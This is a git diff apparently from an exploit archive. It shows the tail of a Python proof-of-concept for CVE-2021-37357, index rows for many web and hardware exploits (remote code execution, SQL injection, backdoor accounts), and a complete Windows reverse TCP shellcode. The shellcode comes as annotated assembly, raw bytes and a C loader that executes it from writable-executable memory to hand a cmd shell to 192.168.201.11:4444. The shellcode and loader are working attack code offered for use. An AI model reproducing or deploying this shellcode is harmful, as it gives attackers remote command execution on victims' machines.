_\/\\\/////////\\\_\/////\\\///__\/\\\\\\___\/\\\_\///\\________\/\\\__ + _\/\\\_______\/\\\_____\/\\\_____\/\\\/\\\__\/\\\__/\\/_________\/\\\__ + _\/\\\\\\\\\\\\\/______\/\\\_____\/\\\//\\\_\/\\\_\//___________\/\\\__ + _\/\\\/////////________\/\\\_____\/\\\\//\\\\/\\\__________/\\\\\\\\\__ + _\/\\\_________________\/\\\_____\/\\\_\//\\\/\\\_________/\\\////\\\__ + _\/\\\_________________\/\\\_____\/\\\__\//\\\\\\________\/\\\__\/\\\__ + _\/\\\______________/\\\\\\\\\\\_\/\\\___\//\\\\\________\//\\\\\\\/\\_ + _\///______________\///////////__\///_____\/////__________\///////\//__ + ''' + info = 'CVE-2021-37357 PoC'.center(76) + credits = 'Created by @AffineSecurity and @qhum7sec'.center(76) + print(f"{art}\n{info}\n{credits}") + +def main(): + logo() + hostname = sys.argv[1] + username = sys.argv[2] + password = sys.argv[3] + + if len(sys.argv) != 4: + print("Usage: python3 exploit.py http://127.0.0.1:80 username password") + + exploit(hostname, username, password) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1f5bcc305..4c75f74a1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44182,6 +44182,7 @@ id,file,description,date,author,type,platform,port 50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",1970-01-01,"Luca Bernardi",webapps,php, 50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",1970-01-01,"Bryan Leong",webapps,php, 50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Simone Cristofaro",webapps,php, +50132,exploits/hardware/webapps/50132.py,"Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection",1970-01-01,"Metin Yunus Kandemir",webapps,hardware, 50137,exploits/php/webapps/50137.txt,"WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php, 50138,exploits/php/webapps/50138.txt,"WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation",1970-01-01,nhattruong,webapps,php, 50139,exploits/php/webapps/50139.txt,"WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)",1970-01-01,"Vikas Srivastava",webapps,php, @@ -44264,9 +44265,11 @@ id,file,description,date,author,type,platform,port 50256,exploits/php/webapps/50256.txt,"WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php, 50254,exploits/hardware/webapps/50254.txt,"Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure",1970-01-01,icekam,webapps,hardware, 50255,exploits/multiple/webapps/50255.txt,"WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Sentinal920,webapps,multiple, +50259,exploits/php/webapps/50259.txt,"OpenSIS 8.0 'modname' - Directory Traversal",1970-01-01,"Eric Salario",webapps,php, 50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",1970-01-01,"Allen Enosh Upputori",webapps,php, 50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mason Soroka-Gill",webapps,php, 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php, +50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload",1970-01-01,a-rey,webapps,php, 50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple, 50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php, 50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php, @@ -44308,6 +44311,7 @@ id,file,description,date,author,type,platform,port 50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,V1n1v131r4,webapps,php, 50324,exploits/php/webapps/50324.txt,"WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50325,exploits/php/webapps/50325.html,"WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)",1970-01-01,0xB9,webapps,php, +50326,exploits/php/webapps/50326.txt,"Budget and Expense Tracker System 1.0 - Arbitrary File Upload",1970-01-01,"()t/\\/\\1",webapps,php, 50327,exploits/php/webapps/50327.txt,"Police Crime Record Management Project 1.0 - Time Based SQLi",1970-01-01,"()t/\\/\\1",webapps,php, 50328,exploits/aspx/webapps/50328.txt,"SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure",1970-01-01,"Andrei Manole",webapps,aspx, 50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php, @@ -44315,11 +44319,14 @@ id,file,description,date,author,type,platform,port 50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php, 50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware, 50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, +50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware, +50342,exploits/hardware/webapps/50342.py,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,hardware, 50343,exploits/php/webapps/50343.txt,"WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Nosa Shandy",webapps,php, 50344,exploits/php/webapps/50344.txt,"WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50346,exploits/php/webapps/50346.txt,"WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50348,exploits/php/webapps/50348.py,"Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php, +50350,exploits/php/webapps/50350.txt,"WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting",1970-01-01,0xB9,webapps,php, 50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Eric Salario",webapps,php, 50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Mr.Gedik,webapps,php, 50355,exploits/php/webapps/50355.txt,"Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php, @@ -44383,3 +44390,6 @@ id,file,description,date,author,type,platform,port 50437,exploits/windows/webapps/50437.txt,"Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read",1970-01-01,z4nd3r,webapps,windows, 50432,exploits/php/webapps/50432.txt,"Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation",1970-01-01,"Oscar Gil Gutierrez",webapps,php, 50435,exploits/php/webapps/50435.txt,"Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,Ghuliev,webapps,php, +50438,exploits/java/webapps/50438.txt,"Jetty 9.4.37.v20210219 - Information Disclosure",1970-01-01,"Mayank Deshmukh",webapps,java, +50439,exploits/php/webapps/50439.py,"Clinic Management System 1.0 - SQL injection to Remote Code Execution",1970-01-01,"Pablo Santiago",webapps,php, +50440,exploits/php/webapps/50440.txt,"Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)",1970-01-01,"Sam Ferguson",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 3dd8bb7f2..183fffa14 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1025,3 +1025,4 @@ id,file,description,date,author,type,platform 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86 48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86 48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86 +50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64 diff --git a/shellcodes/windows_x86-64/50291.c b/shellcodes/windows_x86-64/50291.c new file mode 100644 index 000000000..16f87a8c9 --- /dev/null +++ b/shellcodes/windows_x86-64/50291.c @@ -0,0 +1,290 @@ +# Title: Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes) +# Date: 09.12.2021 +# Author: Xenofon Vassilakopoulos +# Tested on: Windows/x64 - 10.0.19043 N/A Build 19043 + +/* + +MIT License + +Copyright (c) 2021 Xenofon Vassilakopoulos + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + + +[BITS 32] + +global _start + +section .text + +_start: + +; Locate Kernelbase.dll address +XOR ECX, ECX ;zero out ECX +MOV EAX, FS:[ecx + 0x30] ;EAX = PEB +MOV EAX, [EAX + 0x0c] ;EAX = PEB->Ldr +MOV ESI, [EAX + 0x14] ;ESI = PEB->Ldr.InMemoryOrderModuleList +LODSD ;memory address of the second list entry structure +XCHG EAX, ESI ;EAX = ESI , ESI = EAX +LODSD ;memory address of the third list entry structure +XCHG EAX, ESI ;EAX = ESI , ESI = EAX +LODSD ;memory address of the fourth list entry structure +MOV EBX, [EAX + 0x10] ;EBX = Base address + +; Export Table +MOV EDX, DWORD [EBX + 0x3C] ;EDX = DOS->e_lfanew +ADD EDX, EBX ;EDX = PE Header +MOV EDX, DWORD [EDX + 0x78] ;EDX = Offset export table +ADD EDX, EBX ;EDX = Export table +MOV ESI, DWORD [EDX + 0x20] ;ESI = Offset names table +ADD ESI, EBX ;ESI = Names table +XOR ECX, ECX ;EXC = 0 + +GetFunction : + +INC ECX; increment counter +LODSD ;Get name offset +ADD EAX, EBX ;Get function name +CMP dword [EAX], 0x50746547 ;"PteG" +JNZ SHORT GetFunction ;jump to GetFunction label if not "GetP" +CMP dword [EAX + 0x4], 0x41636F72 ;"rocA" +JNZ SHORT GetFunction ;jump to GetFunction label if not "rocA" +CMP dword [EAX + 0x8], 0x65726464 ;"ddre" +JNZ SHORT GetFunction ;jump to GetFunction label if not "ddre" + +MOV ESI, DWORD [EDX + 0x24] ;ESI = Offset ordinals +ADD ESI, EBX ;ESI = Ordinals table +MOV CX, WORD [ESI + ECX * 2] ;CX = Number of function +DEC ECX ;Decrement the ordinal +MOV ESI, DWORD [EDX + 0x1C] ;ESI = Offset address table +ADD ESI, EBX ;ESI = Address table +MOV EDX, DWORD [ESI + ECX * 4] ;EDX = Pointer(offset) +ADD EDX, EBX ;EDX = GetProcAddress + +; Get the Address of LoadLibraryA function +XOR ECX, ECX ;ECX = 0 +PUSH EBX ;Kernel32 base address +PUSH EDX ;GetProcAddress +PUSH ECX ;0 +PUSH 0x41797261 ;"Ayra" +PUSH 0x7262694C ;"rbiL" +PUSH 0x64616F4C ;"daoL" +PUSH ESP ;"LoadLibrary" +PUSH EBX ;Kernel32 base address +MOV ESI, EBX ;save the kernel32 address in esi for later +CALL EDX ;GetProcAddress(LoadLibraryA) + +ADD ESP, 0xC ;pop "LoadLibraryA" +POP EDX ;EDX = 0 +PUSH EAX ;EAX = LoadLibraryA +PUSH EDX ;ECX = 0 +MOV DX, 0x6C6C ;"ll" +PUSH EDX +PUSH 0x642E3233 ;"d.23" +PUSH 0x5F327377 ;"_2sw" +PUSH ESP ;"ws2_32.dll" +CALL EAX ;LoadLibrary("ws2_32.dll") + +ADD ESP, 0x10 ;Clean stack +MOV EDX, [ESP + 0x4] ;EDX = GetProcAddress +PUSH 0x61617075 ;"aapu" +SUB word [ESP + 0x2], 0x6161 ;"pu" (remove "aa") +PUSH 0x74726174 ;"trat" +PUSH 0x53415357 ;"SASW" +PUSH ESP ;"WSAStartup" +PUSH EAX ;ws2_32.dll address +MOV EDI, EAX ;save ws2_32.dll to use it later +CALL EDX ;GetProcAddress(WSAStartup) + +; Call WSAStartUp +XOR EBX, EBX ;zero out ebx register +MOV BX, 0x0190 ;EAX = sizeof(struct WSAData) +SUB ESP, EBX ;allocate space for the WSAData structure +PUSH ESP ;push a pointer to WSAData structure +PUSH EBX ;Push EBX as wVersionRequested +CALL EAX ;Call WSAStartUp + +;Find the address of WSASocketA +ADD ESP, 0x10 ;Align the stack +XOR EBX, EBX ;zero out the EBX register +ADD BL, 0x4 ;add 0x4 at the lower register BL +IMUL EBX, 0x64 ;EBX = 0x190 +MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress +PUSH 0x61614174 ;"aaAt" +SUB word [ESP + 0x2], 0x6161 ;"At" (remove "aa") +PUSH 0x656b636f ;"ekco" +PUSH 0x53415357 ;"SASW" +PUSH ESP ;"WSASocketA", GetProcAddress 2nd argument +MOV EAX, EDI ;EAX now holds the ws2_32.dll address +PUSH EAX ;push the first argument of GetProcAddress +CALL EDX ;call GetProcAddress +PUSH EDI ;save the ws2_32.dll address to use it later + +;call WSASocketA +XOR ECX, ECX ;zero out ECX register +PUSH EDX ;null value for dwFlags argument +PUSH EDX ;zero value since we dont have an existing socket group +PUSH EDX ;null value for lpProtocolInfo +MOV DL, 0x6 ;IPPROTO_TCP +PUSH EDX ;set the protocol argument +INC ECX ;SOCK_STREAM(TCP) +PUSH ECX ;set the type argument +INC ECX ;AF_INET(IPv4) +PUSH ECX ;set the ddress family specification argument +CALL EAX ;call WSASocketA +XCHG EAX, ECX ;save the socket returned from WSASocketA at EAX to ECX in order to use it later + +;Find the address of connect +POP EDI ;load previously saved ws2_32.dll address to ECX +ADD ESP, 0x10 ;Align stack +XOR EBX, EBX ;zero out EBX +ADD BL, 0x4 ;add 0x4 to lower register BL +IMUL EBX, 0x63 ;EBX = 0x18c +MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress +PUSH 0x61746365 ;"atce" +SUB word [ESP + 0x3], 0x61 ;"tce" (remove "a") +PUSH 0x6e6e6f63 ;"nnoc" +PUSH ESP ;"connect", second argument of GetProcAddress +PUSH EDI ;ws32_2.dll address, first argument of GetProcAddress +XCHG ECX, EBP +CALL EDX ;call GetProcAddress + +;call connect +PUSH 0x0bc9a8c0 ;sin_addr set to 192.168.201.11 +PUSH word 0x5c11 ;port = 4444 +XOR EBX, EBX ;zero out EBX +add BL, 0x2 ;TCP protocol +PUSH word BX ;push the protocol value on the stack +MOV EDX, ESP ;pointer to sockaddr structure (IP,Port,Protocol) +PUSH byte 16 ;the size of sockaddr - 3rd argument of connect +PUSH EDX ;push the sockaddr - 2nd argument of connect +PUSH EBP ;socket descriptor = 64 - 1st argument of connect +XCHG EBP, EDI +CALL EAX ;execute connect; + +;Find the address of CreateProcessA +ADD ESP, 0x14 ;Clean stack +XOR EBX, EBX ;zero out EBX +ADD BL, 0x4 ;add 0x4 to lower register BL +IMUL EBX, 0x62 ;EBX = 0x194 +MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress +PUSH 0x61614173 ;"aaAs" +SUB dword [ESP + 0x2], 0x6161 ;"As" +PUSH 0x7365636f ;"seco" +PUSH 0x72506574 ;"rPet" +PUSH 0x61657243 ;"aerC" +PUSH ESP ;"CreateProcessA" - 2nd argument of GetProcAddress +MOV EBP, ESI ;move the kernel32.dll to EBP +PUSH EBP ;kernel32.dll address - 1st argument of GetProcAddress +CALL EDX ;execute GetProcAddress +PUSH EAX ;address of CreateProcessA +LEA EBP, [EAX] ;EBP now points to the address of CreateProcessA + +;call CreateProcessA +PUSH 0x61646d63 ;"admc" +SUB word [ESP + 0x3], 0x61 ;"dmc" ( remove a) +MOV ECX, ESP ;ecx now points to "cmd" string +XOR EDX, EDX ;zero out EDX +SUB ESP, 16 +MOV EBX, esp ;pointer for ProcessInfo + +;STARTUPINFOA struct +PUSH EDI ;hStdError => saved socket +PUSH EDI ;hStdOutput => saved socket +PUSH EDI ;hStdInput => saved socket +PUSH EDX ;lpReserved2 => NULL +PUSH EDX ;cbReserved2 => NULL +XOR EAX, EAX ;zero out EAX register +INC EAX ;EAX => 0x00000001 +ROL EAX, 8 ;EAX => 0x00000100 +PUSH EAX ;dwFlags => STARTF_USESTDHANDLES 0x00000100 +PUSH EDX ;dwFillAttribute => NULL +PUSH EDX ;dwYCountChars => NULL +PUSH EDX ;dwXCountChars => NULL +PUSH EDX ;dwYSize => NULL +PUSH EDX ;dwXSize => NULL +PUSH EDX ;dwY => NULL +PUSH EDX ;dwX => NULL +PUSH EDX ;pTitle => NULL +PUSH EDX ;pDesktop => NULL +PUSH EDX ;pReserved => NULL +XOR EAX, EAX ;zero out EAX +ADD AL, 44 ;cb => 0x44 (size of struct) +PUSH EAX ;eax points to STARTUPINFOA + +;ProcessInfo struct +MOV EAX, ESP ;pStartupInfo +PUSH EBX ;pProcessInfo +PUSH EAX ;pStartupInfo +PUSH EDX ;CurrentDirectory => NULL +PUSH EDX ;pEnvironment => NULL +PUSH EDX ;CreationFlags => 0 +XOR EAX, EAX ;zero out EAX register +INC EAX ;EAX => 0x00000001 +PUSH EAX ;InheritHandles => TRUE => 1 +PUSH EDX ;pThreadAttributes => NULL +PUSH EDX ;pProcessAttributes => NULL +PUSH ECX ;pCommandLine => pointer to "cmd" +PUSH EDX ;ApplicationName => NULL +CALL EBP ;execute CreateProcessA + +*/ + +#include +#include +#include + +char code[] = +"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x96\xad\x8b" +"\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31" +"\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f" +"\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde" +"\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xc9\x53" +"\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54" +"\x53\x89\xde\xff\xd2\x83\xc4\x0c\x5a\x50\x52\x66\xba\x6c\x6c\x52\x68\x33" +"\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x04" +"\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68" +"\x57\x53\x41\x53\x54\x50\x89\xc7\xff\xd2\x31\xdb\x66\xbb\x90\x01\x29\xdc" +"\x54\x53\xff\xd0\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b\xdb\x64\x8b\x14\x1c" +"\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68" +"\x57\x53\x41\x53\x54\x89\xf8\x50\xff\xd2\x57\x31\xc9\x52\x52\x52\xb2\x06" +"\x52\x41\x51\x41\x51\xff\xd0\x91\x5f\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b" +"\xdb\x63\x8b\x14\x1c\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63" +"\x6f\x6e\x6e\x54\x57\x87\xcd\xff\xd2\x68\xc0\xa8\xc9\x0b\x66\x68\x11\x5c" +"\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x55\x87\xef\xff\xd0\x83" +"\xc4\x14\x31\xdb\x80\xc3\x04\x6b\xdb\x62\x8b\x14\x1c\x68\x73\x41\x61\x61" +"\x81\x6c\x24\x02\x61\x61\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72" +"\x68\x43\x72\x65\x61\x54\x89\xf5\x55\xff\xd2\x50\x8d\x28\x68\x63\x6d\x64" +"\x61\x66\x83\x6c\x24\x03\x61\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57" +"\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52" +"\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50" +"\x52\x52\x51\x52\xff\xd5"; + +int main(int argc, char** argv) +{ + //HWND hWnd = GetConsoleWindow(); + //ShowWindow(hWnd, SW_HIDE); + printf("Shellcode Length: %d\n", strlen(code)); + void* exec = VirtualAlloc(0, strlen(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(exec, code, sizeof(code)); + ((void(*)())exec)(); + + return 0; +} \ No newline at end of file